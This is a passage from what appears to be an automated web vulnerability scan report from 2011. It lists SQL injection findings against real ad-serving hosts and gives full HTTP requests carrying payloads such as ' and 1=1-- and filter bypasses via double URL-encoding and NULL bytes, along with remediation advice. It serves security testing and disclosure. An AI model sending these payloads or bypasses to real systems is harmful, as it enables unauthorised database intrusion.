34.67. http://syndication.jobthread.com/jt/syndication/page.php

34.68. http://technolog.msnbc.redacted/_vine/printer

34.69. http://thelastword.msnbc.redacted/_vine/printer

34.70. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

34.71. http://vms.redacted/vms.aspx

34.72. http://webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

34.73. http://wrapper.g.redacted/GRedirect.aspx

34.74. http://www.bing.com/events/search

34.75. http://www.bing.com/maps/

34.76. http://www.bing.com/maps/default.aspx

34.77. http://www.bing.com/maps/explore/

34.78. http://www.bing.com/msnhomepagehistory.aspx

34.79. http://www.bing.com/news/results.aspx

34.80. http://www.bing.com/news/search

34.81. http://www.bing.com/sck

34.82. http://www.bing.com/search

34.83. http://www.bing.com/shopping

34.84. http://www.bing.com/shopping/bird-feeders/search

34.85. http://www.bing.com/shopping/content/search

34.86. http://www.bing.com/shopping/makeup/c/4259

34.87. http://www.bing.com/shopping/search

34.88. http://www.bing.com/shopping/swimwear/c/4503

34.89. http://www.bing.com/travel/

34.90. http://www.bing.com/travel/content/search

34.91. http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do

34.92. http://www.bing.com/travel/deals/last-minute-flight-deals.do

34.93. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

34.94. http://www.bing.com/videos/services/user/info

34.95. http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo

34.96. http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo

34.97. http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs

34.98. http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck

34.99. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

34.100. http://www.co2stats.com/propres.php

34.101. http://www.codeplex.com/site/analyticsid.aspx

34.102. http://www.facebook.com/extern/login_status.php

34.103. http://www.hoovers.com/favicon.ico

34.104. http://www.kanoodle.com/ajax/search_spy_data.html

34.105. http://www.kanoodle.com/ajax/search_spy_data_today.html

34.106. http://www.kanoodle.com/images/kanoodle-lightbulb-home.gif

34.107. http://www.newsvine.com/_action/article/emailThis

34.108. http://www.newsvine.com/_action/user/startTracking

34.109. http://www.newsvine.com/_action/user/stopTracking

34.110. http://www.newsvine.com/_vine/m2

34.111. http://www.newsvine.com/_vine/printer

34.112. http://www.polls.newsvine.com/_vine/printer

34.113. http://www.reimage.com/images/reimage.ico

34.114. http://www.reimage.com/lp/nhome/css/fonts/candelabook-webfont.woff

34.115. http://www.scientificamerican.com/assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3

34.116. http://www.scientificamerican.com/assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3

34.117. http://www.scientificamerican.com/assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3

34.118. http://www.scout.com/webproxy.ashx

34.119. http://www.silverlight.net/resources/script/omniture/analyticsid.aspx

34.120. http://www.tigerdirect.com/secure/captcha/JpegImage.aspx

34.121. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd

34.122. http://www.w3.org/TR/html4/strict.dtd

34.123. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

35. Content type is not specified

35.1. http://l.player.ooyala.com/errors/report

35.2. http://l.player.ooyala.com/verify

35.3. https://login.live.com/hiphelp.srf

35.4. http://news.ycombinator.com/newest

35.5. http://news.ycombinator.com/news



1. SQL injection
There are 134 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Issue detail

The TargetID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d1--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5679

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jan 26 14:26:13 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_MobilePro_GetA500AppleGiftCard_300x250_072010.swf";
var gif = "http://s0.2mdn.net/3003537/1- TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=apple_giftcard&SC=S056001&ch_id=D&s_id=MSN&c_id=GFTCRD&o_id=GFTCRD");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/v%3B233553561%3B2-0%3B0%3B57213973%3B4307-300/250%3B40436237/40454024/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f" + ctV
...[SNIP]...

Request 2

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935'%20and%201%3d2--%20&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Dec 21 15:59:08 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3003537/TR_Laser_TradeFreeFor60DaysGet500_300x250_100110.swf";
var gif = "http://s0.2mdn.net/3003537/ TR_MobilePro_GetA500AppleGiftCard_BackupGif_072010.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/250%3B39943464/39961251/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttps://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S047401&ch_id=D&s_id=MSN&c_id=LSER&o_id=60DAY+500");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/u%3B233553561%3B0-0%3B0%3B57213973%3B4307-300/2
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [PG parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The PG parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the PG parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the PG request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6381

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3%2527%2527&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:50:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 699

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00'&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6398
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:59 GMT
Expires: Sun, 30 Jan 2011 14:48:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!%00''&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 711
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:59 GMT
Expires: Sun, 30 Jan 2011 14:48:59 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The &PID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the &PID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6634

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 16:06:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Screener_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d1--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/z%3B234282361%3B2-0%3B0%3B58044029%3B4307-300/250%3B38529139/38546896/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU";
ctp[1] = "clickTag1";
ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";


var fv='"m
...[SNIP]...

Request 2

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6466

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:41:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334'%20and%201%3d2--%20&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d1/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex =
...[SNIP]...

1.5. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d852149/4/864449/decide.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

